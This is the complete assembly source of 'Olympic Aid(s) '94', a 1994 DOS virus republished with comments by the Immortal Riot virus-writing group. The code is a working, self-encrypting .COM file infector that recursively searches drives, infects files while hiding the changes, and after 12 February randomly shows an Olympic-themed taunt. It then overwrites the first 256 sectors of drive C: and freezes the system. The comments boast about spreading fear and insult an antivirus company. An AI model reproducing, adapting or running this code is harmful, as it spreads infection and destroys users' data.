; VirusName: Olympic Aid(s) '94 ; Origin : Norway ; Author : The Penetrator ; Date : 1/01/1994 ; ; Hopefully the Olympics at Lillehammer is over when you read this ; shit.This virus was made only for creating fear, and some publicity. ; ; Anyway this is a new selfencrypting non-overwriting *.COM infector... ; And YES, it may (and WILL) harm you. It's a 10% chanse for a Major ; ScrewUp (NO ScrewUps before February the 12th. Just to give it some ; time to spread) ; ; And I have to send some fuckings to Norman Data Defence Systems in ; Drammen, Norway. They is fucking up the BBS scene here in Norway ; right now! ; // The Penetrator/NORWAY ; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä ; (Now follows Immortal Riot comments!); ; This is the virus, WE got accused for writing, how silly! Anyhow ; I picked this one up from a dude in Norway, and he told me that ; I could include it in our magazine, or whatever. ; ; It's nothing fancy or something, but hey! it surely was easy ; publicity!, too bad that the papers accused US for doing it.. ; We didn't, this is just a contribution from our friends in Norway, ; that we picked up AFTER we'd got the silly F-bull 2.11, and had to ; investigate the situation. ; ; I've in this version recieved another ansi-screen to include, dunno ; about the last one.. Anyhow, this is as The Penetrate said a non-ow ; .COM infector. It searches the whole directory tree of files to ; infect, thus making it slow when its spreads trough the drive. It's ; also highly destructive (NM.NUKE.VCL.256.TRASH). Some code resembles ; of VCL based code, but if you want to read more about it, just read ; our article about VCL.Olympic also included in Insane Reality issue4. ; ; HAHA!, Norway, Sweden got 24 gold-medals from the Olympic.Games ; (If the ice-hockey counts!!), just as I told you! Haha!, AND give ; my best to Beate (can't you give girls REAL-names in Norway??). ; ; Thanks to All Norweigian contributors // The Unforgiven/Immortal Riot. ; ; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä ; OLYMPIC AID(S) '94 ; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ JUST FOR FIRST TIME INSTALLING --Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä main proc near db 0E9h,00h,00h ; Near Jump ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ S T A R T O F V I R I I ÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä start: call find_offset ; Like a PUSH IP find_offset: pop bp ; We love POP'ing push bp ; and PUSH'ing pop bp ; bp's sub bp,offset find_offset ; Adjust for length of host GeneticChange: MOV byte ptr [BP+GeneticChange+4],001h ; call encrypt_decrypt ; Decrypt the virus start_of_code label near lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus mov bp,sp ; BP points to stack sub sp,128 ; Allocate 128 bytes on stack mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack int 021h mov cx,0005h ; Do X infections search_loop: push cx ; Save CX add byte ptr [DI+GeneticChange+4],001h ; Some BullShit!!! call search_files ; Find and infect a file pop cx ; Restore CX loop search_loop ; Repeat until CX is 0 ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ CHECKING DATE/TIME FOR OLYMPIC START ÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä CheckDate: mov ah,2ah int 21h ; DOS Services ah=function 2Ah ; get date, cx=year, dh=month ; dl=day, al=day-of-week 0=SUN cmp DH,2h ; February jB NoFuckUp cmp DL,12 ; The Olympics is starting jB NoFuckUp ; the 12 th. mov ah,2Ch int 21h ; DOS Services ah=function 2Ch ; get time, cx=hrs/min, dx=sec cmp DL,10 ; 10 % chanse for... jA NoFuckUp Yeah: jmp OL1994 ; ScrewUp... ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ RETURN NICELY AND QUIET TO INFECTED FILE ÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä NoFuckUp: pop dx ; DX holds original DTA address mov ah,01Ah ; DOS set DTA function int 021h mov sp,bp ; Deallocate local buffer xor ax,ax ; mov bx,ax ; mov cx,ax ; mov dx,ax ; Empty out the registers mov si,ax ; mov di,ax ; mov bp,ax ; ret ; Return to original program main endp ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ LET'S LOOK AT THE OLYMPIC RINGS -Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä OL1994: mov ah,0Fh ; BIOS get video mode function int 010h xor ah,ah ; BIOS set video mode function int 010h ; (Clear Screen) lea si,[di + AnsiData] ; SI points to data mov cx,AnsiEnd-AnsiData ; Data Length JCXZ Done xor di,di mov ax,0b800h mov es,ax MOV DX,DI ;Save X coordinate for later. XOR AX,AX ;Set Current attributes. CLD LOOPA: LODSB ;Get next character. CMP AL,32 ;If a control character, jump. JC ForeGround STOSW ;Save letter on screen. Next: LOOP LOOPA JMP Short Done ForeGround: CMP AL,16 ;If less than 16, then change the JNC BackGround ;foreground color. Otherwise jump. AND AH,0F0H ;Strip off old foreground. OR AH,AL JMP Next BackGround: CMP AL,24 ;If less than 24, then change the JZ NextLine ;background color. If exactly 24, JNC FlashBitToggle ;then jump down to next line. SUB AL,16 ;Otherwise jump to multiple output ADD AL,AL ;routines. ADD AL,AL ADD AL,AL ADD AL,AL AND AH,8FH ;Strip off old background. OR AH,AL JMP Next NextLine: ADD DX,160 ;If equal to 24, MOV DI,DX ;then jump down to JMP Next ;the next line. FlashBitToggle: CMP AL,27 ;Does user want to toggle the blink JC MultiOutput ;attribute? JNZ Next XOR AH,128 ;Done. JMP Next MultiOutput: CMP AL,25 ;Set Z flag if multi-space output. MOV BX,CX ;Save main counter. LODSB ;Get count of number of times MOV CL,AL ;to display character. MOV AL,32 JZ StartOutput ;Jump here if displaying spaces. LODSB ;Otherwise get character to use. DEC BX ;Adjust main counter. StartOutput: XOR CH,CH INC CX REP STOSW MOV CX,BX DEC CX ;Adjust main counter. LOOPNZ LOOPA ;Loop if anything else to do... Done: ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ HAAKON & KRISTIN SCREWS UP -----Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä TrashHD: CLI ; Disable interrupts mov ax,0002h ; DRIVE C: mov cx,100h ; Sectors (100hex=256DEC!) XOR DX,DX ; Clear DX (start with sector 0) int 026h ; DOS absolute write interrupt EndlessLoop: JMP EndlessLoop ; Boring...ehh??? ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ FIND FILES ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä search_files proc near push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,64 ; Allocate 64 bytes on stack mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 64] ; SI points to 64-byte buffer int 021h mov ah,03Bh ; DOS change directory function lea dx,[di + root] ; DX points to root directory int 021h call traverse ; Start the traversal mov ah,03Bh ; DOS change directory function lea dx,[bp - 64] ; DX points to old directory int 021h mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; Return to caller root db "\",0 ; Root directory search_files endp traverse proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first function mov cx,00010000b ; CX holds search attributes lea dx,[di + all_files] ; DX points to "*.*" int 021h jc leave_traverse ; Leave if no files present check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? jne another_dir ; If not, try again cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? je another_dir ;If so, keep going mov ah,03Bh ; DOS change directory function lea dx,[bp - 98] ; DX points to new directory int 021h call traverse ; Recursively call ourself pushf ; Save the flags mov ah,03Bh ; DOS change directory function lea dx,[di + up_dir] ; DX points to parent directory int 021h popf ; Restore the flags jnc done_searching ; If we infected then exit another_dir: mov ah,04Fh ; DOS find next function int 021h jnc check_dir ; If found check the file leave_traverse: lea dx,[di + com_mask] ; DX points to "*.COM" call find_files ; Try to infect a file done_searching: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller up_dir db "..",0 ; Parent directory name all_files db "*.*",0 ; Directories to search for com_mask db "*.COM",0 ; Mask for all .COM files traverse endp ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ FIND MORE FILES ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä find_files proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save file mask mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds all file attributes pop dx ; Restore file mask find_a_file: int 021h jc done_finding ; Exit if no files found call infect_file ; Infect the file! jnc done_finding ; Exit if no error mov ah,04Fh ; DOS find next file function jmp short find_a_file ; Try finding another file done_finding: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller find_files endp ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ FUCK A FILE ÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä infect_file proc near mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx ; SI points to the DTA mov byte ptr [di + set_carry],0 ; Assume we'll fail cmp word ptr [si + 01Ah],(65279 - (finish - start)) jbe size_ok ; If it's small enough continue jmp infection_done ; Otherwise exit size_ok: mov ax,03D00h ; DOS open file function, r/o lea dx,[si + 01Eh] ; DX points to file name int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,3 ; CX holds bytes to read (3) lea dx,[di + buffer] ; DX points to buffer int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h xchg dx,ax ; Faster than a PUSH AX mov ah,03Eh ; DOS close file function int 021h xchg dx,ax ; Faster than a POP AX sub ax,finish - start + 3 ; Adjust AX for a valid jump cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? je infection_done ; If equal then exit mov byte ptr [di + set_carry],1 ; Success -- the file is OK add ax,finish - start ; Re-adjust to make the jump mov word ptr [di + new_jump + 1],ax ; Construct jump mov ax,04301h ; DOS set file attrib. function xor cx,cx ; Clear all attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h mov ax,03D02h ; DOS open file function, r/w int 021h xchg bx,ax ; BX holds file handle mov ah,040h ; DOS write to file function mov cx,3 ; CX holds bytes to write (3) lea dx,[di + new_jump] ; DX points to the jump we made int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h push si ; Save SI through call call encrypt_code ; Write an encrypted copy pop si ; Restore SI mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h mov ah,03Eh ; DOS close file function int 021h mov ax,04301h ; DOS set file attrib. function xor ch,ch ; Clear CH for file attribute mov cl,[si + 015h] ; CX holds file's old attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed ret ; Return to caller set_carry db ? ; Set-carry-on-exit flag buffer db 090h,0CDh,020h ; Buffer to hold old three bytes new_jump db 0E9h,?,? ; New jump to virus infect_file endp ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ CRUNCHED OLYMPIC RINGS -ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä AnsiData: DB 15,16,24,24,24,1,26,17,'Ä ',15,'L i l l e h a' DB ' m m e r ',39,' 9 4 ',1,26,17,'Ä',24,24,25,20 DB 'Haakon And Kristin Blew It Up Again...',24,25,19,26,5 DB 'Ü',25,10,8,26,5,'Ü',25,10,4,26,5,'Ü',24,25,16,1,'ÜÛ' DB 'ßß',25,3,'ßßÛÜ',25,4,8,'ÜÛßß',25,3,'ßßÛÜ',25,4,4,'Ü' DB 'Ûßß',25,3,'ßßÛÜ',24,25,15,1,'Ûß',25,8,14,'Ü',17,'Ü',1 DB 16,'Û',14,'ÜÜÜ',8,'Ûß',25,8,2,'Ü',8,18,'ß',16,'Û',2,'Ü' DB 'ÜÜ',4,'Ûß',25,9,'ßÛ',24,25,14,1,'Ûß',25,6,14,'ÜÛßß ' DB 1,'ßÛ ',8,'Ûß',14,'ÛÜ',25,4,2,'ÜÛßß ',8,'ßÛ ',20,' ',0 DB 'Ü',2,16,'ÛÜ',25,9,4,'ßÛ',24,25,14,1,'ÛÜ',25,5,14,'Û' DB 'ß',25,3,1,'ÜÛ ',8,'ÛÜ ',14,'ßÛ',25,2,2,'Ûß',25,3,8,'Ü' DB 'Û ',4,'ÛÜ ',2,'ßÛ',25,8,4,'ÜÛ',24,25,15,1,'ÛÜ',25,3,14 DB 'Ûß',25,3,1,'ÜÛ',25,2,8,'ÛÜ ',14,'ßÛ ',2,'Ûß',25,3,8,'Ü' DB 'Û',25,2,4,'ÛÜ ',2,'ßÛ',25,6,4,'ÜÛ',24,25,16,1,'ßÛÜÜ' DB ' ',14,'ÛÜ ',1,'ÜÜÛß',25,4,8,'ßÛ',14,'ÜÛ ',2,'ÛÜ ',8,'Ü' DB 'ÜÛß',25,4,4,'ßÛ',2,'ÜÛ',25,3,4,'ÜÜÛß',24,25,19,1,'ß' DB 'ßß',14,17,'ÛÜ',1,16,'ß',25,8,14,'ÜÛ',8,'ßßß',2,'Û',8 DB 18,'ß',16,'ß',25,8,2,'ÜÛ',4,26,5,'ß',24,25,23,14,'ßÛ' DB 'ÜÜ',25,3,'ÜÜÛß',25,4,2,'ßÛÜÜ',25,3,'ÜÜÛ',0,18,'Ü',24 DB 16,25,26,14,26,5,'ß',25,10,2,26,5,'ß',25,12,0,'1',24,1 DB 'This Time They Have Been Fucking Around With The Ol' DB 'ympic Computers, And Managed',24,25,2,'To Infect A ' DB 'Lot Of Your Computers With A Little Tiny Destructiv' DB 'e Virus...',24,24,'Now, Antonio, You Can',39,'t Let' DB ' Them Runaway With This, Punish The Little Bastards' DB '!',24,24,26,'OÄ',24,24,24,24 AnsiEnd: DB 0 ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ WRITE ENCRYPTED COPY Ä--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä encrypt_code proc near push bp ; Save BP mov bp,di ; Use BP as pointer to code lea si,[bp + encrypt_decrypt]; SI points to cipher routine xor ah,ah ; BIOS get time function int 01Ah mov word ptr [si + 9],dx ; Low word of timer is new key xor byte ptr [si + 1],8 ; xor byte ptr [si + 8],1 ; Change all SIs to DIs xor word ptr [si + 11],0101h; (and vice-versa) lea di,[bp + finish] ; Copy routine into heap mov cx,finish - encrypt_decrypt - 1 ; All but final RET push si ; Save SI for later push cx ; Save CX for later rep movsb ; Copy the bytes lea si,[bp + write_stuff] ; SI points to write stuff mov cx,5 ; CX holds length of write rep movsb ; Copy the bytes pop cx ; Restore CX pop si ; Restore SI inc cx ; Copy the RET also this time rep movsb ; Copy the routine again mov ah,040h ; DOS write to file function lea dx,[bp + start] ; DX points to virus lea si,[bp + finish] ; SI points to routine call si ; Encrypt/write/decrypt mov di,bp ; DI points to virus again pop bp ; Restore BP ret ; Return to caller write_stuff: mov cx,finish - start ; Length of code int 021h encrypt_code endp end_of_code label near ; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä Note db " Olympic Aid(s) '94 " db " (c) The Penetrator " ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ ENCRYPT/DECRYPT ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä encrypt_decrypt proc near lea si,[bp + start_of_code] ; SI points to code to decrypt mov cx,(end_of_code - start_of_code) / 2 ; CX holds length xor_loop: db 081h,034h,00h,00h ; XOR a word by the key inc si ; Do the next word inc si ; loop xor_loop ; Loop until we're through ret ; Return to caller encrypt_decrypt endp finish label near code ends end main ; ÄÄ-ÄÄÄÄÄÄ-ÄÄ END OF STORY ÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä